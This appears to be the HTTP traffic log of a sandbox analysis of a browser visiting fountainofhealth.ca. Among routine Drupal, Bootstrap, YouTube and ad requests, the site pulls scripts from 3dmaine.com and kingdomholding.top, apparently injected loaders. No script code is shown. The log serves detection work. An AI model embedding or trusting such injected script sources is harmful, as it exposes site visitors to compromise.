Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/align.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/button.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/dialog.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/Info-Blue.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /modules/webform/js/webform.states.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/item-list.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/css/bootstrap.css HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /npm/@unicorn-fail/drupal-bootstrap-styles@0.0.2/dist/3.4.0/8.x-3.x/drupal-bootstrap.css HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/js/bootstrap.js HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1host: static.cloudflareinsights.comorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /embed/h15NcT6UXh0?si=YrXkudamh5IoggTR HTTP/1.1host: www.youtube.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX HTTP/1.1host: www.youtube.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws HTTP/1.1host: www.youtube.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /s/player/3b4b7883/www-player.css HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=ReHAOhqWrU8cookie: __Secure-ROLLOUT_TOKEN=CN33uamwubWmXRD6lYjkvtONAxj6lYjkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=f3ynVHy8dD0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGg%3D%3Dpriority: u=0
Source: global traffic	HTTP traffic detected: GET /s/player/3b4b7883/player_ias.vflset/en_US/embed.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=-1fRDkvXcbocookie: __Secure-ROLLOUT_TOKEN=CMOvz4P_4ZCdExCvy4jkvtONAxivy4jkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=C_agYD195PAcookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgOg%3D%3Dpriority: u=1
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/Info-Blue.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /s/player/3b4b7883/www-embed-player.vflset/www-embed-player.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=-1fRDkvXcbocookie: __Secure-ROLLOUT_TOKEN=CMOvz4P_4ZCdExCvy4jkvtONAxivy4jkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=C_agYD195PAcookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgOg%3D%3Dpriority: u=1
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/sticky-header.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/container-inline.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /d.js HTTP/1.1host: 3dmaine.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /s/player/3b4b7883/player_ias.vflset/en_US/base.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=-1fRDkvXcbocookie: __Secure-ROLLOUT_TOKEN=CMOvz4P_4ZCdExCvy4jkvtONAxivy4jkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=C_agYD195PAcookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgOg%3D%3Dpriority: u=1
Source: global traffic	HTTP traffic detected: GET /s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2 HTTP/1.1host: fonts.gstatic.comorigin: https://www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4
Source: global traffic	HTTP traffic detected: GET /s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2 HTTP/1.1host: fonts.gstatic.comorigin: https://www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4
Source: global traffic	HTTP traffic detected: GET /s/player/3b4b7883/player_ias.vflset/en_US/remote.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=VZrzuY-qz_ocookie: __Secure-ROLLOUT_TOKEN=COa79u7kuMTQQBDQs4nkvtONAxjQs4nkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=qKGaFNOnpe0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgEA%3D%3D
Source: global traffic	HTTP traffic detected: GET /ss/fon.js HTTP/1.1Host: kingdomholding.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://fountainofhealth.ca/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /vi_webp/gobWGqPjLSQ/hqdefault.webp HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /vi/FURi5aHgp1g/sddefault.jpg?sqp=-oaymwEmCIAFEOAD8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCTwafuki5vRADsDtfgeiF3qyS0Ew HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/sddefault.webp HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /instream/ad_status.js HTTP/1.1host: static.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pagead/id HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://www.youtube.comx-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/js.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/details.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/position-container.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/progress.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/fonts/glyphicons-halflings-regular.woff2 HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/css/bootstrap.cssaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4
Source: global traffic	HTTP traffic detected: GET /js/th/qGrsDjDjXxcnxnpvJpNLwNqYSxdC2jzwhgPLO7suYzE.js HTTP/1.1host: www.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pagead/id HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://www.youtube.comx-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://www.youtube.comx-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
